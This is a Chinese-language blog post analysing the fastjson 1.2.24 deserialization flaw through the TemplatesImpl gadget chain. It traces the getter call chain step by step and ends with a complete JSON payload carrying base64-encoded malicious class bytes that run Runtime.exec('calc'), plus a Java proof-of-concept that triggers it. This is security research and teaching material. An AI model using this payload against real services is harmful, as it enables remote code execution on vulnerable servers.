Java 反序列化漏洞--fastjson-1.2.24--TemplatesImpl攻击链

已于 2022-02-27 11:35:22 修改
阅读量1.2k 收藏
点赞数 1
分类专栏: Java 基础知识 Fastjson 文章标签: java json
于 2022-02-24 14:52:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/123102391
版权
Java 同时被 3 个专栏收录
16 篇文章 2 订阅
订阅专栏
基础知识
12 篇文章 1 订阅
订阅专栏
Fastjson
1 篇文章 0 订阅
订阅专栏

Java-fastjson-1.2.24反序列化漏洞

前置知识

fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

这里帮运一下素十八大佬总结的fastjson的功能要点

1.使用 JSON.parse(jsonString) 和 JSON.parseObject(jsonString, Target.class),两者调用链一致,前者会在 jsonString 中解析字符串获取 @type 指定的类,后者则会直接使用参数中的class。
2.fastjson 在创建一个类实例时会通过反射调用类中符合条件的 getter/setter 方法,其中 getter 方法需满足条件:方法名长于 4、不是静态方法、以 get 开头且第4位是大写字母、方法不能有参数传入、继承自 Collection|Map|AtomicBoolean|AtomicInteger|AtomicLong、此属性没有 setter 方法;setter 方法需满足条件:方法名长于 4,以 set 开头且第4位是大写字母、非静态方法、返回类型为 void 或当前类、参数个数为 1 个。具体逻辑在 com.alibaba.fastjson.util.JavaBeanInfo.build() 中。
3.使用 JSON.parseObject(jsonString) 将会返回 JSONObject 对象,且类中的所有 getter 与setter 都被调用。
4.如果目标类中私有变量没有 setter 方法,但是在反序列化时仍想给这个变量赋值,则需要使用 Feature.SupportNonPublicField 参数。
5.fastjson 在为类属性寻找 get/set 方法时,调用函数 com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#smartMatch() 方法,会忽略 _|- 字符串,也就是说哪怕你的字段名叫 a_g_e,getter 方法为 getAge(),fastjson 也可以找得到,在 1.2.36 版本及后续版本还可以支持同时使用 _ 和 - 进行组合混淆。
6.fastjson 在反序列化时,如果 Field 类型为 byte[],将会调用com.alibaba.fastjson.parser.JSONScanner#bytesValue 进行 base64 解码,对应的,在序列化时也会进行 base64 编码。//本文中的_bytecodes——是我们把恶意类的.class文件二进制格式进行Base64编码后得到的字符串
7.默认情况下fastjson只会去反序列化public所修饰的属性,想要反序列化私有属性就得在用parseObject()时候设置Feature.SupportNonPublicField

漏洞分析

TemplatesImpl 类位于com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl,实现了 Serializable 接口,因此它可以被序列化
在这里插入图片描述
接下来我们看看漏洞的触发点

getTransletInstance()

首先我们看getTransletInstance() 方法,可以注意到该方法中存在一个 _class数组,是一个 Class 类型的数组,数组里下标为_transletIndex 的类会使用 newInstance() 实例化。倘若_class[_transletIndex]数组可控,我们就可以在里面存放的式我们构造的恶意类
在这里插入图片描述
接下类我们看看哪里调用了getTransletInstance()方法吧
在这里插入图片描述

newTransformer()

在这里插入图片描述
我们可以看到该方法调用了getTransletInstance(),除此之外没有其他有用信息,我们接着看看哪里调用了newTransformer()方法吧
在这里插入图片描述

getOutputProperties()

可以看到getOutputProperties()里面调用了newTransformer()方法
在这里插入图片描述
在这里插入图片描述
而 getOutputProperties() 方法就是类成员变量 _outputProperties 的 getter 方法。

这里就衔接上了我们上面前置知识说的json会调用类中的所有 getter 与setter ,此时我们就有了一条利用链

json->getOutputProperties() -> newTransformer() -> getTransletInstance()

利用链找到了,接下里我们回到getTransletInstance()方法,我们要想办法构造我们的恶意类

恶意类的构造

我们先看看_class数组中的类是否可控
在这里插入图片描述
我们可以看到defineTransletClasses() 中有赋值的动作,而且defineTransletClasses() 在 getTransletInstance() 中,如果 _class 不为空即会被调用

接下来我们分析下defineTransletClasses() 的代码逻辑
在这里插入图片描述
如果_bytecodes 不为空,就会调用自定义的 ClassLoader 去加载 _bytecodes 中的 byte[] 。而 _bytecodes 也是该类的成员属性。
在这里插入图片描述

接下来而如果这个类的父类为 ABSTRACT_TRANSLET 也就是com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet,就会将类成员属性的,_transletIndex 设置为当前循环中的标记位i,而如果是第一次调用,就是_class[0]。如果父类不是这个类,将会抛出异常。

那我们可以这样理解_class[_transletIndex]==_bytecodes[i],而前面正好是_class[_transletIndex]里的类newInstance() 实例化,因此_bytecodes[i]里存的是我们构造的恶意类即可

这里再额外说一点
在这里插入图片描述
defineTransletClasses()里会调用getExternalExtensionsMap(),当_tfactory为null时会报错,所以要对_tfactory设置;_name也是同样如此。
在这里插入图片描述

POC构造

现在我们来进行总结下准备构造POC

默认情况下fastjson只会去反序列化public所修饰的属性,而poc中用到的_bytecodes和_name都是私有属性)想要反序列化私有属性就得在用parseObject()时候设置Feature.SupportNonPublicField
为了满足漏洞点触发之前不报异常及退出,我们还需要满足 _name 不为 null ,_tfactory 不为 null
@type需要指定了解析的类,也就是com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
_bytecodes是我们把恶意类的.class文件二进制格式进行Base64编码后得到的字符串

调用链为

fastjson->getOutputProperties()->newTransformer()->getTransletInstance()->defineTransletClasses()

最终的 payload 为:

{
	"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
	"_bytecodes": ["yv66vgAAADEAMgoABgAjCgAkACUIACYKACQAJwcAKAcAKQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQApTGNvbS9kYXJrZXJib3gv5p6E6YCgYnl0ZWNvZGVzL2J5dGVjb2RlMTsBAApFeGNlcHRpb25zBwAqAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcAKwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwcALAEAClNvdXJjZUZpbGUBAA5ieXRlY29kZTEuamF2YQwABwAIBwAtDAAuAC8BAARjYWxjDAAwADEBACdjb20vZGFya2VyYm94L+aehOmAoGJ5dGVjb2Rlcy9ieXRlY29kZTEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAAEAAEABwAIAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAADwAEABAADQARAAsAAAAMAAEAAAAOAAwADQAAAA4AAAAEAAEADwABABAAEQACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAAFQALAAAAIAADAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABQAFQACAA4AAAAEAAEAFgABABAAFwABAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAGQALAAAAKgAEAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABgAGQACAAAAAQAaABsAAwAJABwAHQACAAkAAAArAAAAAQAAAAGxAAAAAgAKAAAABgABAAAAHgALAAAADAABAAAAAQAeAB8AAAAOAAAABAABACAAAQAhAAAAAgAi"],
	"_name": "su18",
	"_tfactory": {},
	"_outputProperties": {},
}

POC

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

public class Mapentrytest {
    public static void main(String[] args) {
        ParserConfig config = new ParserConfig();
        String text = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADEAMgoABgAjCgAkACUIACYKACQAJwcAKAcAKQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQApTGNvbS9kYXJrZXJib3gv5p6E6YCgYnl0ZWNvZGVzL2J5dGVjb2RlMTsBAApFeGNlcHRpb25zBwAqAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcAKwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwcALAEAClNvdXJjZUZpbGUBAA5ieXRlY29kZTEuamF2YQwABwAIBwAtDAAuAC8BAARjYWxjDAAwADEBACdjb20vZGFya2VyYm94L+aehOmAoGJ5dGVjb2Rlcy9ieXRlY29kZTEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAAEAAEABwAIAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAADwAEABAADQARAAsAAAAMAAEAAAAOAAwADQAAAA4AAAAEAAEADwABABAAEQACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAAFQALAAAAIAADAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABQAFQACAA4AAAAEAAEAFgABABAAFwABAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAGQALAAAAKgAEAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABgAGQACAAAAAQAaABsAAwAJABwAHQACAAkAAAArAAAAAQAAAAGxAAAAAgAKAAAABgABAAAAHgALAAAADAABAAAAAQAeAB8AAAAOAAAABAABACAAAQAhAAAAAgAi\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }}";
        // Fastjson默认只会反序列化public修饰的属性,outputProperties和_bytecodes由private修饰,必须加入Feature.SupportNonPublicField 在parseObject中才能触发;
        Object obj = JSON.parseObject(text, Object.class, config, Feature.SupportNonPublicField);
    }
}

参考文章
https://su18.org/post/fastjson/#1-fastjson-1224
https://www.cnblogs.com/byErichas/p/15723753.html

lmonstergg
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全...及时的漏洞检查和修复是防止此类攻击的关键步骤,而"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"这样的工具为安全管理人员提供了有力的辅助手段。
Caused by: com.alibaba.fastjson.JSONException: default constructor not found. class
beishanyingluo的博客
09-02 893
com.odx.common.bo.user.UserProjectNameRespDTO at com.alibaba.fastjson.util.JavaBeanInfo.build(JavaBeanInfo.java:558) at com.alibaba.fastjson.parser.ParserConfig.createJavaBeanDeserializer(ParserConfig.java:939) at com.alibaba.fastjson.parser.ParserConfi
commons-collections3(cc3)反序列化分析
遇事不决冲冲冲
03-10 2516
commons-collections3反序列化 cc3和cc1想法还是很相似的,然后构造恶意类和调用使用了不同的两个新类 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
webClient + fastJSON2 获取json格式的数据,同时解析至java class 并 下划线转驼峰
最新发布
qq_46662528的博客
06-17 348
决定返回值是什么格式一般情况可以不写,但这里要获取JSON格式的。可以将JSONjava的class属性自动进行匹配。webClient中。fastJSON2中。
Java 反序列化漏洞-Apache Commons Collections2-TemplatesImpl攻击
cjdgg的博客
02-28 628
Java 反序列化漏洞-Apache Commons Collections2前言漏洞挖掘PriorityQueuePriorityQueue.readObject()PriorityQueue.heapify()PriorityQueue.siftDown()PriorityQueue.siftDownUsingComparator()TransformingComparator.compare()构造利用 前言 前面分析了CC1,今天继续学习,分析下CC2。在 ysoserial中 CC2 是用的 P
【夯实Java基础05】为什么面试官总喜欢问StringBuffer 和 StringBuilder 的区别
武哥聊编程
12-05 1035
本文已收录至我的GitHub:Java开发宝典,欢迎大家给个Star:https://github.com/eson15/javaAll 我会持续更新,欢迎star! 微信搜索:武哥聊编程,关注这个Java菜鸟~ 文章目录1. 相同点2. 不同点作者info StringBuilder 和 StringBuffer 的问题已经是老生常谈了,但是为什么还有那么多面试官喜欢问这个问题呢?不知道,我觉得是面试官太low了……???????? 不过我也来把这个知识点给大家总结一下,先说说他们的相同点。 1. 相
TemplatesImpl利用Fastjson注入内存马
weixin_42508548的博客
01-31 1021
TemplatesImpl利用是一个非常重要的东西,要知道,CC可以用它,CB也用它,注入内存马还是用它。因为它可以加载java字节码并实例化。ClassLoader,类加载器,是JVM执行类加载机制的前提,其主要任务为根据一个类的全限定名来读取此类的二进制字节流到JVM内部,然后转换为一个与目标类对应的java.lang.Class对象实例。文章第四部分,了解了实例化类的时候,会自动执行static{}代码块,{}代码块,无参构造方法那么如何注入内存马呢,也是通过newInstance实现。
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSONFastjsonJSON) Genson(JSON) ...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
java反序列化漏洞-金蛇剑之hibernate(上).pdf
12-25
Java反序列化漏洞是安全领域中的一个重要话题,尤其是在企业级应用开发中,因为这直接影响到系统的安全性。在本文中,我们将关注的是与Hibernate框架相关的反序列化漏洞。Hibernate是一个广泛使用的对象关系映射...
fastjson2.x 记录】那些从1.x升级到2.x踩过的坑
02-12 8410
记录 fastjson 从 1.x 版本升级到 2.x 版本后出现的问题和解决方法,方便自己和大家查询。
Java反序列化漏洞——CommonsBeanutils1分析
Thunderclap的博客
02-20 1493
在创建类的对象的时候可以为comparator赋予特定的比较器,值得注意的是如果没有设定自定义的comparator,其默认为ComparableComparator对象,当然,在调用中,将会调用他的compare方法。接收两个参数 bean (类对象)和 name(属性名),方法会返回这个类的这个属性的值,但是他不是直接通过反射取值,而是通过反射调用getter方法获取属性,进而经过恶意的构造,我们可以触发任意的getter方法。getter方法以get开头,setter方法以set开头。
[Java安全]利用TemplatesImpl执行字节码
Y4tacker的博客
07-25 2797
文章目录defineClass利用TemplatesImpl执行字节码 defineClass 介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码 public class TouchFile{ public TouchFile() throws Exception { Runtime.getRuntime().exec("calc"); } } 把它编译成字节码后Base64 之后运行 Method defineClass =
fastjson2中Json下划线转Java驼峰命名
与望
02-22 3214
fastjson2中Json下划线转Java驼峰命名。
[Java安全]fastjson学习(一)
feng的博客
09-02 817
前言 开始学习fastjsonTemplatesImpl利用让我跟的脑子疼,还是太菜了,断点打到后面整个人都是懵的。 初认fastjson Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 它关键的方法就是三个: 将对象转换成JSON字符串:JSON.toJSONString 将JSON字符串转换成对象:JSON.parse
Java 反序列化原理与基础,URLDNS攻击分析
weixin_49248030的博客
11-03 691
​ 序列化是指将对象转化为字节流,其目的是便于对象在内存、文件、数据库或者网络之间传递。反序列化则是序列化的逆过程,即字节流转化为对象的过程,通常是程序将内存、文件、数据库或者网络传递的字节流还原成对象。在 Java 原生的API 中,序列化的过程由 ObjectOutputStream 类的 writeObject()方法实现,反序列化过程由 ObjectInputStream 类的 readObject()方法实现。
TemplatesImpl在Shiro中的利用
Le1a's Blog
03-23 3048
TemplatesImpl在Shiro中的利用 文章首发自: https://www.le1a.com/posts/6e876d26/ 前言 前面学习了CC1、CC3和CC6,其中CC6是不限制版本的一条,那么为什么还要用到TemplatesImpl这条呢?不妨我们设想一下:命令执行和代码执行到底谁更有价值? 例如在PHP中会遇到一个场景,call_user_func和eval都能造成的代码执行,而更多的人愿意使用eval,原因是call_user_func在某种情况下会被限制不能使用assert和sy
爆赞好文之java动态字节码加载(TemplatesImpl)简谈
2301_79724395的博客
04-17 1114
虽然已经学过了,不过忘完了,nice,重学动态加载就是很动态知道吧,你以为,说了等于没说,怎么个动态法呢?具体是在于三个函数loadClass()从已经加载的类缓存、父加载器等位置寻找类(其实就是双亲委派机制),在前面没有找到的情况下执行findClassfindClass()根据基础URL指定的方法来加载类的字节码,可能会在本地文件系统,jar包,或是远程http服务器上读取字节码,然后交给下一个函数defineClass()的作用就是处理前面传入的字节码,将其处理为真正的Java类。
fastjson反序列化漏洞复现过程
04-19
根据提供的引用内容,fastjson反序列化漏洞是一种安全漏洞攻击者可以利用该漏洞在目标系统上执行恶意代码。下面是fastjson反序列化漏洞的复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入语句来确定。 2. 漏洞复现:根据Fastjson的版本号选择相应的漏洞复现方法。 - Fastjson<1.2.24远程代码执行(CNVD-2017-02833):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中插入恶意的Java代码,并通过反序列化操作执行该代码。 - Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止fastjson反序列化漏洞的利用,可以采取以下措施: - 及时升级Fastjson版本:Fastjson团队会及时修复漏洞并发布新版本,及时升级到最新版本可以避免被已知漏洞攻击。 - 输入验证和过滤:在接收用户输入并进行反序列化操作之前,对输入进行严格的验证和过滤,确保输入的数据符合预期的格式和内容。 - 使用安全的JSON库:考虑使用其他安全性更高的JSON库,如Jackson或Gson,来替代Fastjson

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值